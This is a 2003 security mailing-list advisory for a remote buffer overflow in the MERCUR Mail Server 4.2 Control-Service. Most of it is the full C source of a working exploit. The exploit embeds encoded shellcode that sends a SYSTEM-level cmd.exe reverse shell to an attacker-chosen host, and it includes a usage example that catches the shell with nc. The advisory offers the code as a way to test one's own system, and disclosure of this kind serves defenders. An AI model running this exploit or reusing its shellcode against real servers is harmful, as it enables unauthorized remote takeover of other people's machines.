[NT] MERCUR Mail Server Control-Service Vulnerability (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/28/03
- Previous message: SecuriTeam: "[UNIX] Remote Overflow in tHTTPd (< > replacing)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 28 Oct 2003 10:50:04 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MERCUR Mail Server Control-Service Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
A vulnerability in MERCUR's Control-Service allows remote attackers to
overflow an internal buffer, causing it to execute arbitrary code. The
following exploit code can be used to test your system for the mentioned
vulnerability.
DETAILS
Vulnerable systems:
* MERCUR version 4.2
By sending a command in the following format:
<260 bytes><EBP><EIP>
To MERCUR's Control-Service (listening port TCP 32000), it is possible to
cause the program to execute arbitrary code.
Exploit:
/*
mercrexp.c (7/16/2002)
# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
# nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\WINNT\system32>
2c79cbe14ac7d0b8472d3f129fa1df55
(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
// CALL EBX; mcrctrl.exe@0x228e
#define EIP "\x8e\x2c\x40\x00"
// payload.. dumped into remote memory as failed 'username'
// dark spyrit's shell, ripped from jill.c
unsigned char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90"
"\x90\x90\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95"
"\x40\xe2\xfa\x2d\x95\x95\x64\xe2\x14\xad\xd8\xcf\x05\x95"
"\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95\xc8\x1e\x40\x14"
"\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3"
"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66"
"\x33\xe1\x9d\xcc\xca\x16\x52\x91\xd0\x77\x72\xcc\xca\xcb"
"\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6\x5c\xf3"
"\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95"
"\x96\x56\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d"
"\xe1\x94\x95\x95\xa6\x55\x39\x10\x55\xe0\x6c\xc7\xc3\x6a"
"\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95\x7d\xce\x94\x95"
"\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5"
"\x18\xd2\x85\xc5\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18"
"\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18\xd2\x89\xc5\x6a\xc2\x55"
"\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a\xc2\x51"
"\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2"
"\xcd\x14\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95"
"\x18\xd2\xe5\xc5\x18\xd2\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff"
"\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14\x78\xd5\x6b\x6a"
"\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45"
"\x1e\x7d\xc5\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a"
"\x10\x3f\x95\x95\x95\xa6\x55\xc5\xd5\xc5\xd5\xc5\x6a\xc2"
"\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d\xf3\x52"
"\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d"
"\x95\x94\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a"
"\xc2\x49\xa6\x5c\xc4\xc3\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2"
"\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15\xab\x95\xe1\xba"
"\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff"
"\x95\x6a\xa3\xc0\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05"
"\x05\x05\x05\x7e\x27\xff\x95\xfd\x95\x91\x95\x95\xc0\xc6"
"\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1\x09\xff"
"\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2"
"\x49\x7e\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e"
"\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95"
"\xd2\xf0\xe1\xc6\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa"
"\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6"
"\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1\xc5\xfc"
"\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6"
"\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4"
"\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed"
"\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9\xfa\xe6"
"\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6"
"\xfa\xf6\xfe\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6"
"\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0"
"\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb\xf0\xed"
"\xf0\x95\x0a";
// fake user
unsigned char user[] = "\x78\x78\x78\x78\x0a";
// ebp/eip overwrite
unsigned char passwd[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x03\xde\x83\xc3\x02\xff\xd3\xc3\x10"EIP""
"\x0a";
main(char argc, char **argv){
int fd;
int bufsize = 1024;
int buffer = malloc(bufsize);
unsigned short int a_port;
unsigned long a_host;
struct sockaddr_in sin;
struct hostent *he;
struct in_addr in;
printf("MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit
(07/16/2002)\n");
printf("2c79cbe14ac7d0b8472d3f129fa1df55
(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)\n\n");
if (argc < 5){
printf("usage: %s <targethost> <controlport> <localhost>
<localport>\n", argv[0]);
printf(" controlport: MERCUR Control-Service port (default
32000)\n\n");
printf("NOTE: tested against win2k and winxp pro..\n\n");
exit(-1);
}
// riiiiiiip
a_port = htons(atoi(argv[4]));
a_port ^= 0x9595;
if ((he = gethostbyname(argv[3])) == 0){herror(argv[3]);exit(-1);}
a_host = *((unsigned long *)he->h_addr);
a_host ^= 0x95959595;
shell[1113] = ((a_port) & 0xff);
shell[1114] = ((a_port >> 8) & 0xff);
shell[1118] = ((a_host) & 0xff);
shell[1119] = ((a_host >> 8) & 0xff);
shell[1120] = ((a_host >> 16) & 0xff);
shell[1121] = ((a_host >> 24) & 0xff);
if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) <
0){perror("socket error");exit(-1);}
if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr,
he->h_length);}
else
if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve
host");exit(-1);}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
sin.sin_port = htons(atoi(argv[2]));
printf("ret: 0x00402c8e (mrcctrl.exe v.4.2.1.0)\n\n");
printf("connecting to tcp port %s...\n", argv[2]);
if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) <
0){perror("connection error");exit(-1);}
printf("connected.\n\n");
sleep(1);
printf("dumping payload...");
if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write
error");exit(-1);}
printf("done\n");
sleep(1);
printf("sending fake login...");
if(write(fd, user, strlen(user)) < strlen(user)){perror("write
error");exit(-1);}
printf("done\n");
sleep(1);
printf("eip overrun...");
if(write(fd, passwd, strlen(passwd)) < strlen(passwd)){perror("write
error");exit(-1);}
printf("done\n\n");
printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);
close(fd);
}
ADDITIONAL INFORMATION
The information has been provided by Anonymous.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Remote Overflow in tHTTPd (< > replacing)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution
vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and
Microsoft Windows XP Service ... (Securiteam) - [NEWS] Arkeia Network Backup Client Allows Unauthenticated Remote Access to Computer
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The Arkeia Network Backup Client
allows a remote ... my $class = shift; ... sub Check { ...
(Securiteam) - [NT] COOL! Remote Control DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... excellent remote computing
system that is very easy to use. ... Remote Control 1.12 ... Control (server)
component that could allow a remote attacker to crash the ... (Securiteam) - [NEWS] Apple QuickTime Multiple Vulnerabilities (PICT, Integer Overflow, DoS)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... vulnerabilities have been discovered
in Apple's QuickTime. ... PICT Remote Memory Overwrite: ... Apple QuickTime
PictureViewer is reported prone to remote memory overwrite ... (Securiteam) - [NEWS] Adobe SVG Viewer Local and Remote File Reading
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... "Adobe SVG Viewer 3.0 is
available in 15 languages and many ... A vulnerability in Adobe's SVG allows remote
attackers to read locally ... (Securiteam)
